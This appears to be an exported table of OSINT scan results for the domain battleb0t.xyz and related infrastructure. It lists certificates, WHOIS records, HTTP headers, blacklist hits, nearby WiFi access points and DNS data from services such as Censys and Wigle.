| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 172.67.168.252 |
| 2023-05-12 03:32:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.9:443 | 188.114.97.0/24 |
| 2023-05-12 02:44:20 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:8d:d7:e0:05:18:38:a5:db:8a:48:64:f2:68:9a:98:22:c8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 26 02:43:31 2023 GMT
Not After : Jul 25 02:43:30 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
6e:46:f1:1e:e1:9f:06:66:b4:a8:76:85:82:4c:61:2f:de:37:
70:5e:a3:ab:ce:31:a5:e4:63:10:5d:02:f9:ef:bd:c4:11:85:
80:6c:fc:c5:84:b0:c5:6b:a0:c4:07:ac:78:f3:1f:48:7e:f7:
86:c2:2f:cf:18:f5:92:dd:9a:51:6a:86:ae:51:1d:75:24:9f:
d6:b2:e6:73:f5:1b:4b:e1:d9:79:e3:8c:6d:d9:f5:09:8b:04:
13:69:59:dc:c2:b8:16:59:fc:4b:dd:d4:70:53:86:d9:46:1f:
4d:75:2f:f5:5d:24:f4:03:69:e5:72:06:59:2d:70:8b:88:1b:
c1:6e:20:f4:5c:2c:e2:e1:c4:72:50:4a:c0:18:b3:d8:69:e9:
db:ae:5d:67:ee:07:2b:bd:14:58:30:61:50:1a:c8:bf:41:ea:
16:f9:d3:c8:60:89:41:8f:2e:74:af:3d:af:75:1d:3b:a1:aa:
eb:1e:d5:15:4a:21:6f:8c:e6:17:0c:be:34:82:b6:75:05:7b:
8e:d6:da:74:1c:32:3b:c5:5e:fc:60:88:85:77:b4:ca:57:ff:
3c:36:de:a9:4f:dc:93:d8:f4:d4:75:d4:5f:6c:78:5c:f7:cb:
36:fe:04:b5:16:3b:bd:9f:a9:99:de:01:fa:7f:2c:28:60:7e:
4a:61:2b:70
| battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-4030 (Net ID: F8:1D:0F:69:40:38) | 37.751, -97.822 |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.89): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | wirelessnet (Net ID: 00:04:5A:F9:8F:10) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 12M-5G20E240 (Net ID: 00:01:9F:20:E2:44) | 34.0544, -118.244 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | cf-ray: 7c5f60688e300ce1-EWR | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:21 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-1f4d\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:21 GMT", "cf-ray": "7c5f60688e300ce1-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | BVITestNetz (Net ID: 00:01:E3:47:0D:EB) | 50.1188, 8.6843 |
| 2023-05-12 03:33:39 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx
VC6.NV
cN u:v
O3dufp
YEexY?w
a:Y7"
O5dgc
vR K
nkRZD
227sO5d
ffFsk
4kFQZW
/\\J
J 4 N
AaoCX
9$BfJ
cod:5j
M:IBU
VBjeb
d<nDA
`CK2nF
Zl`Q`
D':XB6
_dmVA
zLrzr
`G\.A
1!lF:N
?vRerLz
'ac:YB
IDATt
ac:gf
>B6qj8
"IURI
jBWK5
/U--3ul.
-$ul/Hu2
p?6'
tcW>N`G
vyL K
/T_t?V
IDAT4
Mvaea
d WmN
l@OS9Z
8?$m9U
.9`-i
o-.Hw
bazHbqf
0glrO
pyaI?o
.Namj
e@!Pu
WZy4d
4vU.N<
O9A1m
V`V5KE
J:'`W
LEKC
rf3GKrO
W'xwu
vlj8>E
XV0s_X
>'GA:
"V_VZI
>l@ K
ffff.3
` Y3u
1spu.
1fiWVr
X"d \/hu
!k@k\
D7qvq
tS'CV
jLp2.3
E-Wh@k
fSwtn
Wq!AK
\Bwaf
Xia>J
IDAT9fma
'F11:
/Oamr
uTl6`M
\ X'
gGaq9
5muiN\
bkMrSz
YMzjm
. TB4
.fmbVvJ
l2LSu
kOrv/!
RxB J
IDAT/I
!KEkC
uvl5qY
-U9!B
dFvdb
spyoi
USxLf1 | https://pics.battleb0t.xyz/images/nwp.PNG |
| 2023-05-12 03:33:43 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | "Exif
sgssso
<Qwm7
>6x.O
x>t7?
g$sy?
.b97<
/Ggy!
l/5-o
ggs43Z
x.o.n>
NNEsz
gmuss
Mswy5
dIys6
>t6w6
03Ryr\G
a>0xM
g_on8
9!6sBsmms
?r:\t
L5M3O
nq_JxO
`uns?g
F1_?J
$vw3C
?.O:H
Gq$rMmo
0y7?i
<?qgg
WYeyq$
!um_KM
ykmsrzz
?2Cm7
3>O0?
irIyo
t.Iof?y
R\y2I
tnt"3
!t5K?/
hfIoq'
bI>sy
w?f?f?
<Aq"Cio
/uMbO
> Ige
>km7M
1$vw0
y.n/"
/uM>9
njKym
v:Ky$
ryw2Com
s<U?o
v?R.>
hGydd
soyg'
:7Ieq
5zO-$
2pMsw
wGo$w?<w
:xssms
jVw:o
.?ygs
nn9?m
oO_n:
nFumS
W7ofc
U95 5
Gs\-?o
ry>f<
gae$w
?2kmO
sIyf/!
t8y<?
\Cwy1
_Bx_K
oeqq$
g5b9c
/2?.o/
hcg>o
kkkn?
/`0E'
xn/<a
uwosm
.<7qq
zdWqk
$1\Mm
rzW?'
tx<Iogss
ldU9?
K?.?/
r\isI
?6gAs
$Kxn<
nnnOS
qyooo
Hc<M?
Ej\Ioy'
x'8_a | https://pics.battleb0t.xyz/images/random_3.jpg |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | China | 00ffcc.cn |
| 2023-05-12 03:21:07 | Malicious IP on Same Subnet | Yes | Emerging Threats | 0 | 0 | 4 | 0 | None | emergingthreats.net [46.101.128.0/17]
https://rules.emergingthreats.net/blockrules/compromised-ips.txt | 46.101.128.0/17 |
| 2023-05-12 02:44:06 | Domain Whois | No | Whois | 15 | 0 | 1 | 0 | None | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
| battleb0t.xyz |
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | malsup.github.io | 185.199.109.153 |
| 2023-05-12 02:54:41 | Raw Data from RIRs | No | Censys | 0 | 0 | 3 | 0 | None | {"last_updated_at": "2023-05-12T01:05:57.807Z", "ip": "104.196.30.220", "location_updated_at": "2023-05-02T18:59:17.407146Z", "autonomous_system_updated_at": "2023-05-02T18:59:17.407518Z", "location": {"province": "South Carolina", "city": "North Charleston", "country": "United States", "coordinates": {"latitude": 32.8929, "longitude": -80.0458}, "postal_code": "29418", "country_code": "US", "timezone": "America/New_York", "continent": "North America"}, "dns": {"records": {"serchservice.com": {"record_type": "A", "resolved_at": "2023-04-03T15:50:30.214978872Z"}, "www.wash.aczgroup.eu": {"record_type": "CNAME", "resolved_at": "2022-12-24T14:36:37.278010953Z"}, "kx-uat.roslin.app": {"record_type": "CNAME", "resolved_at": "2023-02-15T12:07:03.906401331Z"}, "tonysports.panel.pretii.lat": {"record_type": "CNAME", "resolved_at": "2023-01-09T15:20:03.375902235Z"}, "www.thestyladavinci.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T22:32:02.762915401Z"}, "mrivera.dev": {"record_type": "A", "resolved_at": "2023-02-28T15:51:09.820120890Z"}, "www.nickreid.com": {"record_type": "CNAME", "resolved_at": "2023-02-04T13:47:12.869307138Z"}, "www.lamina.glass": {"record_type": "CNAME", "resolved_at": "2023-03-08T16:12:21.973068103Z"}, "www.kks110.com": {"record_type": "CNAME", "resolved_at": "2023-03-19T14:04:31.895403615Z"}, "jayceecard.com": {"record_type": "A", "resolved_at": "2023-04-14T19:00:35.829641836Z"}, "whitmansolutions.com": {"record_type": "A", "resolved_at": "2023-04-27T07:30:19.997063406Z"}, "www.watthub.ca": {"record_type": "A", "resolved_at": "2023-03-06T12:43:12.904404257Z"}, "sg-web.karibu.com": {"record_type": "CNAME", "resolved_at": "2023-04-24T15:01:24.181601886Z"}, "pedantic-shockley-9911be.netlify.com": {"record_type": "A", "resolved_at": "2023-03-20T22:11:55.426310736Z"}, "tong315.com": {"record_type": "A", "resolved_at": "2023-01-12T13:58:08.172576533Z"}, "johnmulliganportfolio.com": {"record_type": "A", "resolved_at": "2022-11-11T13:23:19.387716434Z"}, "www.stellardeveloper.in": {"record_type": "CNAME", "resolved_at": "2023-02-16T16:36:42.499736344Z"}, "bloomerly.app": {"record_type": "A", "resolved_at": "2022-12-25T12:05:25.788489726Z"}, "francotorres.dev": {"record_type": "A", "resolved_at": "2023-01-14T14:40:08.721824931Z"}, "www.coreygo.com": {"record_type": "CNAME", "resolved_at": "2023-02-06T10:58:57.722319814Z"}, "www.antofredric.com": {"record_type": "CNAME", "resolved_at": "2022-10-17T16:40:40.245190254Z"}, "huynhmy.com": {"record_type": "A", "resolved_at": "2022-10-18T04:53:14.149659491Z"}, "www.trachtenverein-mainburg.de": {"record_type": "CNAME", "resolved_at": "2023-02-11T10:49:31.548109948Z"}, "apefootball.io": {"record_type": "A", "resolved_at": "2022-12-03T15:07:17.123487364Z"}, "deltafox.online": {"record_type": "A", "resolved_at": "2023-03-14T03:21:49.003492443Z"}, "gogogoyou.netlify.app": {"record_type": "A", "resolved_at": "2023-02-05T12:05:19.280143581Z"}, "delivermegoodies.com": {"record_type": "A", "resolved_at": "2023-03-26T15:00:31.047791856Z"}, "stucco.mx": {"record_type": "A", "resolved_at": "2023-01-22T15:23:26.371682923Z"}, "www.codingwithvikram.com": {"record_type": "CNAME", "resolved_at": "2022-10-17T17:38:28.994673827Z"}, "frikicine.com": {"record_type": "A", "resolved_at": "2023-04-05T14:42:25.627990678Z"}, "wisdomwords.in": {"record_type": "A", "resolved_at": "2023-04-27T18:51:48.245769853Z"}, "www.piotrkazmierczak.com": {"record_type": "CNAME", "resolved_at": "2022-10-17T16:47:55.717225282Z"}, "www.joshfinnie.com": {"record_type": "CNAME", "resolved_at": "2022-10-01T13:18:40.718964312Z"}, "glyphish.com": {"record_type": "A", "resolved_at": "2022-12-09T13:22:50.649811134Z"}, "earlytrade-app-staging.netlify.com": {"record_type": "A", "resolved_at": "2023-01-19T13:29:33.856736752Z"}, "beta.audendo.com": {"record_type": "CNAME", "resolved_at": "2023-03-26T19:41:04.004238284Z"}, "fuegos.ar": {"record_type": "A", "resolved_at": "2023-01-30T12:07:11.183950039Z"}, "www.ianmackenzie.dev": {"record_type": "CNAME", "resolved_at": "2023-04-10T17:28:23.534587630Z"}, "andyotter.com": {"record_type": "A", "resolved_at": "2023-04-15T13:42:19.149978491Z"}, "www.jazbogross.com": {"record_type": "CNAME", "resolved_at": "2023-01-29T13:39:11.151551213Z"}, "rumblewood.com": {"record_type": "A", "resolved_at": "2022-10-17T15:51:32.655397110Z"}, "alimonapour.me": {"record_type": "A", "resolved_at": "2022-10-17T18:09:13.464783579Z"}, "mashga.me": {"record_type": "A", "resolved_at": "2023-03-10T00:45:44.484928885Z"}, "okylocky.com": {"record_type": "A", "resolved_at": "2023-04-18T13:08:21.338492626Z"}, "acase.cc": {"record_type": "A", "resolved_at": "2023-04-11T13:04:31.164199944Z"}, "rafagarces.com": {"record_type": "A", "resolved_at": "2023-04-18T15:21:49.838203990Z"}, "www.joseemariane.com": {"record_type": "CNAME", "resolved_at": "2022-10-06T13:35:27.344852169Z"}, "suspicious-northcutt-ea8cde.netlify.app": {"record_type": "A", "resolved_at": "2023-01-29T12:06:14.806823826Z"}, "clearkit.netlify.app": {"record_type": "A", "resolved_at": "2022-12-17T12:05:48.247336458Z"}, "www.spartanthrift.com": {"record_type": "CNAME", "resolved_at": "2023-01-21T14:08:45.073081401Z"}, "standupexcusegenerator.com": {"record_type": "A", "resolved_at": "2023-04-25T16:15:30.932304918Z"}, "allianz-osn.demo.hubtype.com": {"record_type": "CNAME", "resolved_at": "2023-03-06T14:19:47.550585954Z"}, "tech.joshnotes.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T15:39:08.160206214Z"}, "relooki.ma": {"record_type": "A", "resolved_at": "2023-01-09T15:22:11.025369046Z"}, "k1patel.com": {"record_type": "A", "resolved_at": "2022-10-06T13:35:56.488860522Z"}, "cesarvarela.com": {"record_type": "A", "resolved_at": "2023-01-23T13:07:01.795663799Z"}, "thunderous-pegasus-22c0db.netlify.app": {"record_type": "A", "resolved_at": "2023-02-03T12:05:48.649555661Z"}, "saranshvaid.com": {"record_type": "A", "resolved_at": "2022-10-17T16:20:11.681803937Z"}, "cani.hceris.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T23:04:57.283193315Z"}, "www.diverselab.info": {"record_type": "CNAME", "resolved_at": "2023-05-08T18:12:06.613215851Z"}, "wanda-blog.netlify.app": {"record_type": "A", "resolved_at": "2023-03-20T18:06:26.124263705Z"}, "justfreecode.com": {"record_type": "A", "resolved_at": "2023-03-29T06:06:29.982491579Z"}, "www.fest.i.ng": {"record_type": "CNAME", "resolved_at": "2023-04-13T19:40:09.807661140Z"}, "www.airbear.ai": {"record_type": "CNAME", "resolved_at": "2022-10-17T16:31:17.366816569Z"}, "nft-master.io": {"record_type": "A", "resolved_at": "2023-03-22T15:36:21.474841579Z"}, "www.kkeisuke.com": {"record_type": "CNAME", "resolved_at": "2022-10-17T17:52:54.022773401Z"}, "www.irinasucoverschi.com": {"record_type": "A", "resolved_at": "2023-02-11T13:36:16.416115769Z"}, "match.catacomb.cloud": {"record_type": "CNAME", "resolved_at": "2023-04-03T13:01:33.557249725Z"}, "allmightyclub.com": {"record_type": "A", "resolved_at": "2023-04-14T13:25:00.206855801Z"}, "fancy-taiyaki-def320.netlify.app": {"record_type": "A", "resolved_at": "2023-03-20T18:09:41.008114725Z"}, "pelemijo.tukuyok.net": {"record_type": "CNAME", "resolved_at": "2023-04-15T19:59:43.965739973Z"}, "sandrarubinstein.com.au": {"record_type": "A", "resolved_at": "2023-03-29T20:53:34.264063598Z"}, "mint-nyolings.io": {"record_type": "A", "resolved_at": "2022-10-17T17:56:07.078920687Z"}, "workshop.thecustomeristhehero.com": {"record_type": "CNAME", "resolved_at": "2023-02-08T15:49:56.171673454Z"}, "sustainableearthworks.au": {"record_type": "A", "resolved_at": "2023-03-11T12:16:53.147174398Z"}, "charliescollectibleshow.com": {"record_type": "A", "resolved_at": "2023-03-23T14:52:04.137501408Z"}, "ghost.joeczubiak.com": {"record_type": "A", "resolved_at": "2023-03-23T15:38:46.631800177Z"}, "www.abraham-designs.com": {"record_type": "CNAME", "resolved_at": "2023-04-02T13:19:50.321816323Z"}, "ethanpieniazek.com": {"record_type": "A", "resolved_at": "2022-12-24T13:17:39.518830299Z"}, "topwalkingtoursportugal.com": {"record_type": "A", "resolved_at": "2023-03-28T16:24:18.145873463Z"}, "pavanaditya.com": {"record_type": "A", "resolved_at": "2022-10-17T15:44:46.924686856Z"}, "hotel-silverstar.com": {"record_type": "A", "resolved_at": "2022-12-07T13:42:01.027274847Z"}, "alfonzoweb.tech": {"record_type": "A", "resolved_at": "2022-10-17T16:48:17.755742508Z"}, "felkeszito.com": {"record_type": "A", "resolved_at": "2023-02-19T14:00:29.453539558Z"}, "www.hotflashheatwave.com": {"record_type": "CNAME", "resolved_at": "2023-04-07T00:45:16.120624048Z"}, "circleci-deploy.tutorials.symops.com": {"record_type": "CNAME", "resolved_at": "2023-04-14T20:11:00.799705049Z"}, "mint.wagmiunited.com": {"record_type": "A", "resolved_at": "2022-12-31T14:35:50.440390656Z"}, "ivc-app-staging.mindsetmedical.com": {"record_type": "CNAME", "resolved_at": "2023-04-27T15:51:19.056715744Z"}, "46681.info": {"record_type": "A", "resolved_at": "2023-01-05T15:08:14.969970747Z"}, "stephenkennicutt.com": {"record_type": "A", "resolved_at": "2022-10-17T16:37:17.676643859Z"}, "anime.guilherr.me": {"record_type": "CNAME", "resolved_at": "2022-11-20T15:22:11.384286829Z"}, "clustertool.lionz.biz": {"record_type": "CNAME", "resolved_at": "2022-11-02T12:20:02.594560408Z"}, "vajm.me": {"record_type": "A", "resolved_at": "2023-01-12T14:51:55.272145425Z"}, "www.iannoble.co.uk": {"record_type": "CNAME", "resolved_at": "2022-12-05T17:12:09.872956366Z"}, "boosters.elaniin.dev": {"record_type": "CNAME", "resolved_at": "2022-10-17T18:26:52.217262563Z"}, "www.starkdex.io": {"record_type": "CNAME", "resolved_at": "2023-04-14T22:10:45.403164762Z"}, "julietrubin.com": {"record_type": "A", "resolved_at": "2023-01-21T13:32:04.561723552Z"}, "icons.bbsitting.fr": {"record_type": "CNAME", "resolved_at": "2023-05-08T17:44:09.556998287Z"}, "www.trace.events": {"record_type": "CNAME", "resolved_at": "2023-04-27T18:19:39.404025377Z"}, "vitalpal.ca": {"record_type": "A", "resolved_at": "2023-03-20T17:13:36.160426979Z"}}, "names": ["frikicine.com", "kx-uat.roslin.app", "www.lamina.glass", "stucco.mx", "pelemijo.tukuyok.net", "ghost.joeczubiak.com", "wanda-blog.netlify.app", "alimonapour.me", "allmightyclub.com", "mint-nyolings.io", "francotorres.de | 104.196.30.220 |
| 2023-05-12 02:45:21 | Physical Location | No | ipapi.co | 0 | 0 | 4 | 0 | None | Ashburn, Virginia, VA, United States, US | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | hhcpatp (Net ID: 00:06:25:3B:8E:16) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:30 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 2 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://nuke.battleb0t.xyz', u'http_status': 521, u'plugins': {u'HTTPServer': {u'string': [u'cloudflare']}, u'Script': {}, u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'Title': {u'string': [u'nuke.battleb0t.xyz | 521: Web server is down']}, u'HTML5': {}, u'UncommonHeaders': {u'string': [u'referrer-policy,cf-ray']}, u'IP': {u'string': [u'172.64.80.1']}, u'X-Frame-Options': {u'string': [u'SAMEORIGIN']}, u'X-UA-Compatible': {u'string': [u'IE=Edge']}}}, {}] | nuke.battleb0t.xyz |
| 2023-05-12 02:56:58 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | www.ayhu.xyz | [{"url": "https://www.ayhu.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://www.ayhu.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 02:44:24 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:23:36:1a:72:6e:fc:71:09:49:b1:35:f9:b5:e5:28:80:de
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:52:05 2023 GMT
Not After : Jun 11 12:52:04 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:bd:f9:3b:c0:6f:f8:ab:e7:35:d5:ff:95:55:28:
87:2c:f3:42:5c:6a:f2:dc:b2:0f:7b:b2:97:bc:68:
c2:d8:25:b1:da:3c:de:c9:ee:4a:54:a6:08:c9:a0:
d5:34:39:c8:96:b7:d1:e3:5d:f3:2b:db:f7:37:5d:
57:65:f7:3d:16:c9:ad:d6:e6:bb:bc:97:c6:1c:bc:
c7:1d:a0:c9:cc:3a:d4:e1:69:37:d2:58:c2:fe:42:
4e:90:a6:4c:72:5e:0f:c5:0a:f9:18:b1:c7:54:af:
b4:03:13:bc:ce:85:b6:0d:a5:99:fc:98:b2:37:24:
39:66:7b:f1:78:3b:4b:9e:51:be:75:ad:a6:19:8d:
be:a9:ca:f2:df:b7:73:9f:c6:14:09:e1:46:c4:93:
a4:45:7c:eb:1e:47:42:88:d1:8d:e7:29:c0:07:7b:
ad:57:d3:0b:cf:a1:a1:bc:65:12:20:8e:92:81:50:
55:40:69:4e:0d:62:29:ab:00:e6:81:6e:83:3a:16:
09:da:2a:57:32:b1:5d:79:74:f0:1d:02:e0:52:6d:
d5:85:2d:cb:f6:ef:5e:8f:03:a0:14:64:19:bb:71:
65:85:3e:bc:4e:e8:75:85:4b:a0:7d:df:3f:2a:67:
46:82:ea:56:e3:e5:01:c8:49:e2:f1:a3:b1:04:af:
98:45:24:1b:7e:2d:57:39:72:ff:5a:94:89:31:42:
ae:19:e5:2d:eb:c8:08:fc:be:37:02:5d:04:1a:b3:
f0:62:42:14:91:38:7a:96:77:5e:53:eb:f1:d9:8e:
45:46:0d:65:07:6b:18:0a:65:96:3c:4e:b9:77:05:
52:b4:4d:17:73:72:d9:49:c8:16:75:9c:84:35:12:
73:86:4f:08:27:5d:f3:e9:85:10:9a:ff:e4:3a:63:
ef:83:9f:03:76:a4:3f:ac:72:d5:f4:bb:3a:60:bc:
21:1c:e8:7c:52:79:bd:fe:19:9a:69:78:22:a6:5d:
64:8d:04:55:f3:ec:4d:6c:47:45:2c:6c:9e:cc:14:
be:67:76:25:be:fd:51:60:a1:2e:10:af:1b:46:0c:
e9:ec:3a:3c:0b:c9:2a:97:61:1c:a8:6a:9d:53:cd:
2d:6c:4e:66:f4:08:01:29:89:61:ff:d2:73:d2:a1:
